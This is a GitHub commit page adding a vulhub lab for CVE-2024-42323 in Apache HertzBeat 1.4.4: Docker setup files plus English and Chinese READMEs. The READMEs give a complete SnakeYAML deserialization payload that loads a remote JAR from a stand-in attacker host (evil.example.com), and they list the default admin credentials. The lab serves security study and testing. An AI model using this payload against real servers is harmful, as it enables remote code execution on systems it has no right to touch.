forked from vulhub/vulhub
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Apache-HertzBeat SnakeYaml反序列化漏洞 CVE-2024-42323 (vulhub#599)
* CVE-2024-42323 * CVE-2024-42323 update README.md and README.zh-cn.md config * CVE-2024-42323 update README.md and README.zh-cn.md config v2 * CVE-2024-42323 update README.md and README.zh-cn.md config v3 * Update docker-compose.yaml * Improve README.zh-cn.md * Improve README.md * Fixed Markdown lint --------- Co-authored-by: reus09 <[email protected]> Co-authored-by: Owen Gong <[email protected]>
- Loading branch information
3 people
authored
Mar 8, 2025
1 parent
fa7efa8
commit 416d287
Showing
7 changed files
with
206 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,4 @@ | ||
| # 直接拉取 hertzbeat 1.4.4镜像 | ||
| FROM tancloud/hertzbeat:v1.4.4 | ||
|
|
||
|
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,97 @@ | ||
| # Apache HertzBeat SnakeYaml Deserialization Remote Code Execution (CVE-2024-42323) | ||
|
|
||
| [中文版本(Chinese version)](README.zh-cn.md) | ||
|
|
||
| Apache HertzBeat is an open-source real-time monitoring and alarm tool that supports monitoring of operating systems, middleware, databases, and more through its web interface. | ||
|
|
||
| In versions prior to 1.6.0, HertzBeat uses a vulnerable version of SnakeYAML library for parsing YAML files. When authenticated users import new monitoring types through the `/api/monitors/import` or `/api/alert/defines/import` APIs, they can provide specially crafted YAML content that triggers deserialization of untrusted data, potentially leading to remote code execution on the target system. | ||
|
|
||
| References: | ||
|
|
||
| - <https://forum.butian.net/article/612> | ||
| - <https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx> | ||
| - <https://github.com/wy876/wiki/blob/main/Apache/Apache-HertzBeat-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E(CVE-2024-42323).md> | ||
|
|
||
| ## Environment Setup | ||
|
|
||
| Execute the following command to start a vulnerable HertzBeat 1.4.4 instance: | ||
|
|
||
| ``` | ||
| docker compose up -d | ||
| ``` | ||
|
|
||
| After the service is started, you can access the HertzBeat dashboard at `http://your-ip:1157/dashboard`. The default login credentials are: | ||
|
|
||
| - Username: `admin` | ||
| - Password: `hertzbeat` | ||
|
|
||
| ## Vulnerability Reproduction | ||
|
|
||
| First, you need to compile the yaml-payload project available at <https://github.com/fei9747/yaml-payload/>, and host the generated JAR file on a web server, for example, `http://evil.example.com:4444/yaml-payload.jar`. | ||
|
|
||
| Log into the dashboard, navigate to any monitor page and locate the import button. The interface allows users to import monitor configurations through YAML files: | ||
|
|
||
|  | ||
|
|
||
| We can craft a malicious YAML file that contains the following content, which attempts to load your malicious JAR file when deserialized: | ||
|
|
||
| ```yaml | ||
| - !!org.dromara.hertzbeat.manager.service.impl.AbstractImExportServiceImpl$ExportMonitorDTO | ||
| detected: false | ||
| metrics: | ||
| - basic | ||
| - cache | ||
| - performance | ||
| - innodb | ||
| - status | ||
| - handler | ||
| - connection | ||
| - thread | ||
| - tmp | ||
| - select_type | ||
| - sort | ||
| - table_lock | ||
| - process_state | ||
| - slow_sql | ||
| monitor: | ||
| app: mysql | ||
| collector: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evil.example.com:4444/yaml-payload.jar"]]]] | ||
| description: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evil.example.com:4444/yaml-payload.jar"]]]] | ||
| host: 127.0.0.1 | ||
| intervals: 60 | ||
| name: MYSQL_127.0.0.1 | ||
| status: 1 | ||
| tags: | ||
| - 3 | ||
| - 4 | ||
| params: | ||
| - field: host | ||
| type: 1 | ||
| value: 127.0.0.1 | ||
| - field: port | ||
| type: 0 | ||
| value: '3306' | ||
| - field: database | ||
| type: 1 | ||
| value: null | ||
| - field: username | ||
| type: 1 | ||
| value: root | ||
| - field: password | ||
| type: 2 | ||
| value: 9XNUiI+whoJ4Wih7yOiVwg== | ||
| - field: timeout | ||
| type: 0 | ||
| value: '6000' | ||
| - field: url | ||
| type: 1 | ||
| value: null | ||
| ``` | ||
| When the malicious YAML file is imported through the web interface, HertzBeat will attempt to deserialize its contents, triggering the remote class loading: | ||
|  | ||
| If successful, the payload will execute on the target system. In this example, we can verify the execution by checking for the presence of a newly created file in the container: | ||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,95 @@ | ||
| # Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞(CVE-2024-42323) | ||
|
|
||
| Apache HertzBeat 是一款开源的实时监控告警工具,支持对操作系统、中间件、数据库等多种对象进行监控,并提供 Web 界面进行管理。 | ||
|
|
||
| 在 1.6.0 版本之前,HertzBeat 使用了存在安全漏洞的 SnakeYAML 库来解析 YAML 文件。当已认证用户通过 `/api/monitors/import` 或 `/api/alert/defines/import` 接口导入新的监控类型时,可以提供特制的 YAML 内容触发不受信任数据的反序列化,最终可能导致在目标系统上执行远程代码。 | ||
|
|
||
| 参考链接: | ||
|
|
||
| - <https://forum.butian.net/article/612> | ||
| - <https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx> | ||
| - <https://github.com/wy876/wiki/blob/main/Apache/Apache-HertzBeat-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E(CVE-2024-42323).md> | ||
|
|
||
| ## 环境搭建 | ||
|
|
||
| 执行如下命令启动存在漏洞的 HertzBeat 1.4.4 服务器: | ||
|
|
||
| ``` | ||
| docker compose up -d | ||
| ``` | ||
|
|
||
| 服务启动后,访问 `http://your-ip:1157/dashboard` 进入 HertzBeat 控制面板。默认登录凭据为: | ||
|
|
||
| - 用户名:`admin` | ||
| - 密码:`hertzbeat` | ||
|
|
||
| ## 漏洞复现 | ||
|
|
||
| 首先需要编译 <https://github.com/fei9747/yaml-payload/> 项目生成恶意 JAR 文件,并将其托管在 Web 服务器上,例如 `http://evil.example.com:4444/yaml-payload.jar`。 | ||
|
|
||
| 登录到控制面板后,导航到任意监控页面并找到导入按钮。该界面允许用户通过 YAML 文件导入监控配置: | ||
|
|
||
|  | ||
|
|
||
| 我们可以构造一个包含以下内容的恶意 YAML 文件,当其被反序列化时会加载我们的恶意 JAR 文件: | ||
|
|
||
| ```yaml | ||
| - !!org.dromara.hertzbeat.manager.service.impl.AbstractImExportServiceImpl$ExportMonitorDTO | ||
| detected: false | ||
| metrics: | ||
| - basic | ||
| - cache | ||
| - performance | ||
| - innodb | ||
| - status | ||
| - handler | ||
| - connection | ||
| - thread | ||
| - tmp | ||
| - select_type | ||
| - sort | ||
| - table_lock | ||
| - process_state | ||
| - slow_sql | ||
| monitor: | ||
| app: mysql | ||
| collector: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evil.example.com:4444/yaml-payload.jar"]]]] | ||
| description: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evil.example.com:4444/yaml-payload.jar"]]]] | ||
| host: 127.0.0.1 | ||
| intervals: 60 | ||
| name: MYSQL_127.0.0.1 | ||
| status: 1 | ||
| tags: | ||
| - 3 | ||
| - 4 | ||
| params: | ||
| - field: host | ||
| type: 1 | ||
| value: 127.0.0.1 | ||
| - field: port | ||
| type: 0 | ||
| value: '3306' | ||
| - field: database | ||
| type: 1 | ||
| value: null | ||
| - field: username | ||
| type: 1 | ||
| value: root | ||
| - field: password | ||
| type: 2 | ||
| value: 9XNUiI+whoJ4Wih7yOiVwg== | ||
| - field: timeout | ||
| type: 0 | ||
| value: '6000' | ||
| - field: url | ||
| type: 1 | ||
| value: null | ||
| ``` | ||
| 当通过 Web 界面导入恶意 YAML 文件时,HertzBeat 会尝试反序列化其内容,从而触发远程类加载: | ||
|  | ||
| 如果攻击成功,payload 将在目标系统上执行。在本例中,我们可以通过检查容器中是否存在新创建的文件来验证执行结果: | ||
|  |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| services: | ||
| hertzbeat: | ||
| image: vulhub/hertzbeat:1.4.4 | ||
| container_name: hertzbeat | ||
| environment: | ||
| TZ: Asia/Shanghai | ||
| LANG: zh_CN.UTF-8 | ||
| ports: | ||
| - "1157:1157" | ||
| - "1158:1158" |